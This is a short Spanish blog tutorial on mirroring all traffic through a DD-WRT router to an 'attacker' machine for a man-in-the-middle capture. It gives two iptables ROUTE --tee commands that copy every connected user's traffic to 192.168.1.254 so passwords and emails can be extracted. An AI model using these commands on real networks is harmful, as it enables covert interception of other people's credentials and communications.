Ataque MITM con DD-WRT

En la entrada anterior, estubimos Instalando DD-WRT en el router WRT54GL , hoy vamos a duplicar el trafico de red que circula por este router para entregar una copia a un equipo atacante que lo almacenará y analizará mas adelante.

Tal como se muestra en la imagen, el equipo atacante debe ser capaz de recibir la el trafico de red procedente de todos los equipos conectados al router modificado. Si esta información no viaja cifrada, es posible extraer contraseñas, correos y otros datos relevantes.

En primer lugar debemos configurar nuestro punto de acceso como punto de acceso alambico o descargar el backup de mi router WRT54GL desde aquí. He de decir que este backup de configuración funciona en MI router y no puedo garantizar el funcionamiento en otros routers, menos aun si la versión de dd-wrt o el modelo del aparato son diferentes.

Una vez tengamos el router funcionando normalmente, debemos conectarnos vía telnet introduciendo la IP del router, el usuario root y la clave que hayamos configurado al acceder por primera vez a dd-wrt.

Para redireccionar el trafico, debemos modificar la configuracion de iptables ejecutando los siguientes comandos:

iptables -A PREROUTING -t mangle -j ROUTE --gw 192.168.1.254 --tee
iptables -A POSTROUTING -t mangle -j ROUTE --gw 192.168.1.254 --tee

La IP indicada en naranja será la IP del equipo atacante donde se recibirá una copia del trafico de la red y se recogerá (por ejemplo) con tcpdump, software del que tengo pendiente explicar su uso en una próxima entrada.

FUENTE:
forum.dd-wrt.com
ubuntuforums.org
myopenrouter.com

Deja un comentario